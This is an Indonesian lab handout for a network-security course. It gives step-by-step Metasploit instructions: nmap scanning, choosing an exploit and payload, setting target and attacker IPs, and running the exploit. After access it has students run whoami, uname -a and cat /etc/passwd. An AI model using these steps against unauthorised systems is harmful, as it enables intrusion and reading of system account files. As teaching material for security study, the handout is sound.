Kepada mahasiswa peserta mata kuliah keamanan jaringan, hari ini kita akan belajar menggunakan tools metasploit.
- Konfigurasi Metasploit, buka terminal jalankan perintah: sudo msfdb init
- Lakukan terlebih dahulu scanning terhadap komputer target dengan nmap! Catat port yang terbuka, sistem operasi yang digunakan serta celah keamanan yang ditemukan pada komputer target!
- Jalankan Metasploit dengan menuliskan perintah berikut pada terminal: msfconsole
- Jalankan perintah “search” untuk mencari exploit yang sesuai dengan service/vulnerability yang ditemukan pada hasil scanning!
- Gunakan perintah use untuk memilih exploit yang akan digunakan!
- Gunakan perintah “show payloads” untuk menampilkan payload yang tersedia!
- Gunakan perintah “set” payload!
- Gunakan perintah set RHOST IPTarget! (Ganti dgn IP target)
- Gunakan perintah set LHOST IPPenyerang! (Ganti dgn IP penyerang)
- Gunakan perintah “show options” untuk menampilkan pilihan yang tersedia pada payload tersebut!
- Gunakan perintah “set” untuk menggunakan salah satu option tersebut!
- Gunakan perintah “exploit” untuk menjalankan exploit pada komputer target
- Bila sudah berhasil masuk ke komputer target ketik: a) whoami ; b) tampilkan informasi tentang komputer target dengan perintah uname -a; c) tampilkan daftar user: cat /etc/passwd; d) tampilkan file yang ada disana: ls
- Buat laporan dan kumpulkan ke email dengan subject latihan 5 keamanan jaringan!
Have fun!
tentang metasploit:
modul lama tentang metasploit:
https://julismail.staff.telkomuniversity.ac.id/materi-tambahan-metasploit/